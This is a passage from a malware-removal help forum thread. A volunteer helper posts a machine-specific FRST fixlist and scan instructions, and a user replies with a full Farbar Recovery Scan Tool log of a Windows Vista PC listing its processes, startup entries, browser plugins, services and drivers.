2014-10-09 09:01 - 2010-12-25 11:51 - 00008192 _____ () C:\Users\Hannah\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-10-09 08:47 - 2011-01-14 21:43 - 00000000 ____D () C:\Windows\Minidump
2014-10-09 08:46 - 2013-12-12 09:39 - 274563712 _____ () C:\Windows\MEMORY.DMP

Files to move or delete:
====================
C:\Users\Nick\random.dat
C:\Users\Public\replace.bat


Some content of TEMP:
====================
C:\Users\Bill\AppData\Local\Temp\contentDATs.exe
C:\Users\Bill\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpvj9mxx.dll
C:\Users\Bill\AppData\Local\Temp\jre-6u23-windows-i586-iftw-rv.exe
C:\Users\Bill\AppData\Local\Temp\jre-6u26-windows-i586-iftw-rv.exe
C:\Users\Bill\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe
C:\Users\Bill\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\Bill\AppData\Local\Temp\jre-7u21-windows-i586-iftw.exe
C:\Users\Bill\AppData\Local\Temp\SecurityScan_Release.exe
C:\Users\Dylan\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\Dylan\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\Hannah\AppData\Local\Temp\AutoRun.exe
C:\Users\Hannah\AppData\Local\Temp\AutoRunGUI.dll
C:\Users\Hannah\AppData\Local\Temp\EBU63AA.exe
C:\Users\Hannah\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\Hannah\AppData\Local\Temp\optprosetup.exe
C:\Users\Hannah\AppData\Local\Temp\utt709F.tmp.exe
C:\Users\Nick\AppData\Local\Temp\eauninstall.exe
C:\Users\Nick\AppData\Local\Temp\jre-7u55-windows-i586-iftw.exe
C:\Users\Nick\AppData\Local\Temp\Quarantine.exe
C:\Users\Nick\AppData\Local\Temp\SimCity 4 Deluxe_uninst.exe
C:\Users\Nick\AppData\Local\Temp\_isB08.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-11-01 12:53

==================== End Of Log ============================



#13 Jo*

Jo*

  • Malware Response Team
  • 3,319 posts
  • Gender:Male
  • Location:Germany
  • Local time:08:33 PM

Posted 02 November 2014 - 06:44 AM

Hello topper8281,
 

***


Open Notepad. Please copy the contents of the code box below. To do this, highlight the contents of the box and right-click on it. Paste this into the open Notepad.
Save it in the same location as FRST / FRST64 (usually your desktop) as fixlist.txt.

 
start
EmptyTemp:
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
CHR HKCU\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 radpms; system32\DRIVERS\radpms.sys [X]
C:\Users\Nick\random.dat
C:\Users\Public\replace.bat
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [AdobeBridge] => [X]
end


NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system.


Run FRST / FRST64 again like we did before, but this time press the Fix button just once and wait.
The tool will make a log (Fixlog.txt); please post it in your reply.


***


FRST / FRST64: run it again.
  • Right-click FRST / FRST64, then click "Run as administrator" (XP users: click Run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

***


Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#14 topper8281

topper8281
  • Topic Starter

  • Members
  • 33 posts
  • Local time:11:33 AM

Posted 02 November 2014 - 10:11 AM

Okay here are the two new logs.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 02-11-2014
Ran by Nick (administrator) on WALKER-PC on 02-11-2014 07:07:43
Running from C:\Users\Nick\Desktop
Loaded Profile: Nick (Available profiles: Kristi & Hannah & Nick & Bill & UpdatusUser & Dylan & Administrator)
Platform: Microsoft® Windows Vista™ Ultimate  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 7
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(LogMeIn Inc.) C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
(UltraVNC) C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe
(Avast Software) C:\Program Files\Alwil Software\Avast5\ng\vbox\AvastVBoxSVC.exe
(UltraVNC) C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe
(Microsoft Corporation) C:\Windows\System32\rdpclip.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\avastui.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Spotify Ltd) C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Google Inc.) C:\Users\Nick\AppData\Local\Google\Update\Install\{FFB4FC8A-5624-4ABD-AEE1-B56D5AEAACF1}\GoogleUpdateSetup.exe
(Google Inc.) C:\Users\Nick\AppData\Local\Temp\GUMFBFA.tmp\GoogleUpdate.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-18] (Microsoft Corporation)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 10.0\Reader\Reader_sl.exe [35736 2010-11-10] (Adobe Systems Incorporated)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [932288 2010-11-10] (Adobe Systems Incorporated)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-04-23] (Apple Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SwitchBoard] => C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM\...\Run: [AdobeCS6ServiceManager] => C:\Program Files\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\Alwil Software\Avast5\AvastUI.exe [5223016 2014-10-31] (AVAST Software)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-05-26] (Apple Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [507776 2014-10-07] (Oracle Corporation)
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [googletalk] => C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe [3739648 2007-01-01] (Google)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [Google Update] => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-04-10] (Google Inc.)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [Spotify Web Helper] => C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1140736 2014-05-03] (Spotify Ltd)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\MountPoints2: G - G:\sources\sperr32.exe x64
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\MountPoints2: {b1134796-9622-11e0-9898-0040f4e8e5d1} - F:\noautorun.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe (McAfee, Inc.)
Startup: C:\Users\Bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Nick\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Alwil Software\Avast5\ashShell.dll (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
BootExecute: autocheck autochk * sdnclean.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/?pc=Z016&form=ZGAPHP
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com?fr=hp-avast&type=odc268
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://search.yahoo.com/yhs/search?type=odc268&hspart=avast&hsimp=yhs-001&p={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.yahoo.com?fr=hp-avast&type=odc268
SearchScopes: HKCU - {8A64D544-98BB-C260-590A-335EB1FB0846} URL = http://www.bing.com/search?q={searchTerms}&pc=Z016&form=ZGAIDF
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
Winsock: Catalog5 05 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default
FF Homepage: hxxp://www.google.com/
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin: @real.com/nppl3260;version=16.0.0.282 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlchromebrowserrecordext;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlhtml5videoshim;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlpepperflashvideoshim;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=16.0.0.282 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Nick\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Nick\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpplugin.dll (RealPlayer)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npwachk.dll (Nullsoft, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Nick\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Nick\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF Extension: LogMeIn, Inc. Remote Access Plugin - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\LogMeInClient@logmein.com [2014-10-28]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-12-16]
FF Extension: Reddit Enhancement Suite - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\jid1-xUfzOsOFlzSOXg@jetpack.xpi [2013-05-17]
FF Extension: FlashGot - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2011-03-22]
FF Extension: StumbleUpon - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}.xpi [2011-12-30]
FF Extension: Adblock Plus - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2011-03-27]
FF Extension: Tab Mix Plus - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{dc572301-7619-498c-a57d-39143191b318}.xpi [2011-05-11]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2014-11-01]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2014-11-01]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2014-11-01]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2010-11-21]
FF HKLM\...\Firefox\Extensions: [{34712C68-7391-4c47-94F3-8F88D49AD632}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-01-17]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\Alwil Software\Avast5\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\Alwil Software\Avast5\WebRep\FF [2011-07-07]
FF Extension: No Name - wrc@avast.com [Not Found]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR Profile: C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Pin It) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeocpmaimgdkdkkhnilgfoicilnefefh [2014-07-06]
CHR Extension: (Hot Virtual Keyboard Extension) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\bdejgojmfhngmomodldpdppfbhoajadl [2014-09-04]
CHR Extension: (YouTube) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-01-17]
CHR Extension: (Tetris Flash) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhhalmjbofkjcgefcaejjdicdddpkkk [2014-07-06]
CHR Extension: (Google Search) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-09-07]
CHR Extension: (RealDownloader) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\idhngdhcfkoamngbedgpaokgjbnpdiji [2013-01-17]
CHR Extension: (Music Plus for Google Play Music) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\ipfnecmlncaiipncipkgijboddcdmego [2014-08-25]
CHR Extension: (Chrome In-App Payments service) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-07]
CHR Extension: (Pink My Facebook) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\okcdpfndmnjdijikpehblfeancekjcgo [2014-09-23]
CHR Extension: (Gmail) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-01-17]
CHR Extension: (A HREF) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkanabbomegdcfhkfppalghjamfekegb [2014-10-13]
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\Alwil Software\Avast5\WebRep\Chrome\aswWebRepChrome.crx [2014-10-26]
CHR HKLM\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2012-11-29]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [50344 2014-10-26] (AVAST Software)
R3 AvastVBoxSvc; C:\Program Files\Alwil Software\Avast5\ng\vbox\AvastVBoxSVC.exe [3192344 2014-10-26] (Avast Software)
S4 Futuremark SystemInfo Service; C:\Program Files\Futuremark\Futuremark SystemInfo\FMSISvc.exe [135584 2011-12-09] (Futuremark Corporation)
R2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [1440080 2013-06-28] (LogMeIn Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.0.285\McCHSvc.exe [234776 2012-09-05] (McAfee, Inc.)
S3 RealNetworks Downloader Resolver Service; C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe [38608 2012-11-29] ()
S3 SwitchBoard; C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 uvnc_service; C:\Program Files\uvnc bvba\UltraVNC\WinVNC.exe [1795864 2014-10-01] (UltraVNC)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [24184 2014-10-26] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [70384 2014-10-31] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr.sys [55240 2014-10-26] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\Drivers\aswRvrt.sys [49944 2014-10-26] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [787800 2014-10-31] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [422760 2014-10-26] (AVAST Software)
R1 aswTdi; C:\Windows\system32\drivers\aswTdi.sys [57928 2014-10-26] (AVAST Software)
R0 aswVmm; C:\Windows\system32\Drivers\aswVmm.sys [206248 2014-10-26] ()
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [242240 2012-10-05] (DT Soft Ltd)
R3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [26176 2009-03-18] (LogMeIn, Inc.)
R1 SCDEmu; C:\Windows\system32\Drivers\SCDEmu.sys [59388 2009-11-08] (PowerISO Computing, Inc.) [File not signed]
R2 VBoxAswDrv; C:\Program Files\Alwil Software\Avast5\ng\vbox\VBoxAswDrv.sys [218192 2014-10-26] (Avast Software)
S3 zghsdiag; C:\Windows\System32\DRIVERS\zghsdiag.sys [106752 2011-05-26] (ZTE Incorporated)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [106752 2011-05-26] (ZTE Incorporated)
S3 zghsnmea; C:\Windows\System32\DRIVERS\zghsnmea.sys [106752 2011-05-26] (ZTE Incorporated)

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-02 06:56 - 2014-11-02 06:56 - 06000640 _____ () C:\Program Files\GUTF4EF.tmp
2014-11-02 06:56 - 2014-11-02 06:56 - 00000000 ____D () C:\Program Files\GUMF4EE.tmp
2014-11-02 06:53 - 2014-11-02 06:53 - 00000000 ____D () C:\Users\Nick\Desktop\FRST-OlderVersion
2014-11-01 21:23 - 2014-11-02 06:53 - 01106432 _____ (Farbar) C:\Users\Nick\Desktop\FRST.exe
2014-11-01 11:39 - 2014-11-01 11:39 - 00000199 _____ () C:\Windows\system32\2014-11-01-19-39-27.021-AvastVBoxSVC.exe-2552.log
2014-11-01 11:31 - 2014-11-01 11:31 - 00000249 _____ () C:\Windows\system32\2014-11-01-19-31-32.097-aswFe.exe-4892.log
2014-11-01 11:16 - 2014-11-01 11:31 - 00000249 _____ () C:\Windows\system32\2014-11-01-19-16-09.090-aswFe.exe-4424.log
2014-11-01 11:16 - 2014-11-01 11:16 - 00000199 _____ () C:\Windows\system32\2014-11-01-19-16-00.068-AvastVBoxSVC.exe-3784.log
2014-11-01 11:04 - 2014-11-01 11:04 - 00000000 ____D () C:\Windows\Sun
2014-11-01 11:02 - 2014-11-01 11:02 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-11-01 11:02 - 2014-11-01 11:00 - 00096680 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2014-11-01 11:01 - 2014-11-01 11:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-11-01 10:58 - 2014-11-01 10:58 - 00638376 _____ (Oracle Corporation) C:\Users\Nick\Desktop\jre-8u25-windows-i586-iftw.exe
2014-11-01 10:55 - 2014-11-01 10:55 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-11-01 10:48 - 2014-11-02 07:07 - 00020267 _____ () C:\Users\Nick\Desktop\FRST.txt
2014-11-01 10:45 - 2014-11-01 10:45 - 00002333 _____ () C:\Users\Nick\Desktop\JRT.txt
2014-11-01 10:38 - 2014-11-01 10:38 - 00000000 ____D () C:\Windows\ERUNT
2014-11-01 10:37 - 2014-11-01 10:38 - 00000000 ____D () C:\Windows\system32\vbox
2014-11-01 10:37 - 2014-11-01 10:37 - 01706359 _____ (Thisisu) C:\Users\Nick\Desktop\JRT.exe
2014-11-01 09:57 - 2010-08-30 07:34 - 00536576 _____ (SQLite Development Team) C:\Windows\system32\sqlite3.dll
2014-11-01 09:55 - 2014-11-01 10:32 - 00000000 ____D () C:\AdwCleaner
2014-11-01 09:55 - 2014-11-01 09:55 - 01375089 _____ () C:\Users\Nick\Desktop\AdwCleaner.exe
